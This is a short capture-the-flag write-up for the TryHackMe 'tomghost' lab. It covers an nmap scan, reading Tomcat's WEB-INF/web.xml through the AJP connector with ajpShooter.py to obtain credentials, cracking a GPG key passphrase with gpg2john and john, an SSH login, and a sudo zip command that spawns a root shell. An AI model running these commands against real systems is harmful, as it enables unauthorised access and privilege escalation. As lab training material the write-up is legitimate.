TryHackMe tomghost Writeup
This is a writeup for tomghost CTF from TryHackMe.
My target IP is 10.10.7.100
NMAP
sudo nmap -sS -sV -A 10.10.7.100
4 ports are open. However Apache Tomcat 9.0.3 seems interesting.
EXPLOIT
After some research, I found this exploit:
Lets try it and look for common files.
python3 ajpShooter.py http://10.10.7.100:8080/ 8009 /WEB-INF read
python3 ajpShooter.py http://10.10.7.100:8080/ 8009 /WEB-INF/web.xml read
We got our user and password.
SSH AND USER FLAG
There are both key file and something encrypted with that key. We ca ntry to decrypt it.
gpg --import tryhackme.asc
gpg --list-secret-keys
gpg --output ./creds.txt --decrypt ./credential.pgp
I will use JTR for required password. Copy the PGP key in tryhackme.asc to a file in your desktop, use gpg2john to convert to a hash and crack it with john.
gpg2john pgp.asc > pgp.txt
john --wordlist=rockyou.txt pgp.txt
Now that we have the password, we can enter it and open creds.txt we created.
It contains another user and its password probably for SSH. I will log in as merlin.
We got the user flag. Now lets try if we can get root access.
ROOT FLAG
Firstly, I will look which commands we can use as root.
Apparently we can run zip command. Lets check GTFObins for possible privesc.
I will try this.
TF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'
It worked and we got the root flag.